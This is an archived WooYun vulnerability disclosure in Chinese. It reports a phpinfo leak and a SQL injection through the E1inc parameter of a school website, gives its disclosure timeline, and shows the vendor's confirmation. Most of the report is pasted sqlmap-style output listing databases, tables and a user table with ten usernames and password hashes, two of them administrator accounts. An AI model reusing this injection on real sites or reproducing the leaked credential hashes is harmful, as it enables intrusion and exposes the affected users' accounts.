乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-30: 细节已通知厂商并且等待厂商处理中 2015-12-31: 厂商已经确认,细节仅向厂商公开 2016-01-10: 细节向核心白帽子及相关领域专家公开 2016-01-20: 细节向普通白帽子公开 2016-01-30: 细节向实习白帽子公开 2016-02-12: 细节向公众公开
RT
0x01、phpinfo泄露
http://**.**.**.**/phpinfo.php/RK=0/RS=UyMNB5OeaW
0x02、SQL
http://**.**.**.**/ccsh2010/index.php?menu=510&E1inc=12849&pageID1=1参数:E1inc
8个数据库
current user: 'ccsh@localhost'[11:26:24] [INFO] fetching current databasecurrent database: 'ccsh50'[11:26:25] [INFO] testing if current user is DBA[11:26:25] [INFO] fetching current usercurrent user is DBA: False[11:26:25] [INFO] fetching database namesavailable databases [8]:[*] ccsh50[*] CcshAward[*] ccshforum[*] information_schema[*] mysql[*] phpmyadmin[*] relearn[*] test
56张表
Database: ccsh50[56 tables]+---------------------+| 4images_categories || 4images_comments || 4images_groupaccess || 4images_groupmatch || 4images_groups || 4images_images_temp || 4images_images || 4images_lightboxes || 4images_postcards || 4images_sessions || 4images_sessionvars || 4images_settings || 4images_users || 4images_wordlist || 4images_wordmatch || adodb_logsql || da4_e1news || da4_e4calendar || da4_e5honorlist || da4_e6scholarship || da4_f1photos || da4_f2activities || da4_j4site || da4_per_inf_data || da4_table_list || da4_table_liste || da4_zeng_sen || da4_zeng_voc || e1news || e1sunits || e1type || e4cal_units || e4calendar || e4s2 || e5honorlist || e6scholarship || f1photos || f2activities || f2stype || j1_e_learn || j4site || per_fax || per_gender || per_inf_data || per_office || per_posname || per_subject || per_tel || st_national || user_hacker_ip || user_ip || users_tab || zeng_book || zeng_ci_xing || zeng_sen || zeng_voc |+---------------------+
Database: ccsh50Table: users_tab[4 columns]+----------------+-------------+| Column | Type |+----------------+-------------+| ID_user | int(11) || password_user | varchar(32) || user_type_user | varchar(50) || username_user | varchar(50) |+----------------+-------------+
数据展示
Database: ccsh50Table: users_tab[10 entries]+---------+----------------------------------+---------------+----------------+| ID_user | password_user | username_user | user_type_user |+---------+----------------------------------+---------------+----------------+| 1 | 0750156c1fd61e67a1674203b6a331ef | admin | administrator || 2 | 0750156c1fd61e67a1674203b6a331ef | davidhsu | administrator || 3 | 05a6ce3fee010f9f9029cfdd2188d6cb | chenadmin | normal || 4 | 8c9d3701b0863d6dc70cd1083be6260d | wenchen | normal || 5 | 8c9d3701b0863d6dc70cd1083be6260d | yyy | normal || 6 | 71aad7fe0cb15be5ebab385c2a6434fe | hct | normal || 7 | 8c9d3701b0863d6dc70cd1083be6260d | julan | normal || 8 | 8c9d3701b0863d6dc70cd1083be6260d | sschien | normal || 9 | 8c9d3701b0863d6dc70cd1083be6260d | sun009 | normal || 10 | 8c9d3701b0863d6dc70cd1083be6260d | jey | normal |+---------+----------------------------------+---------------+----------------+
同样可以跨库。。。
已证明
过滤
危害等级:高
漏洞Rank:16
确认时间:2015-12-31 03:28
感謝通報
暂无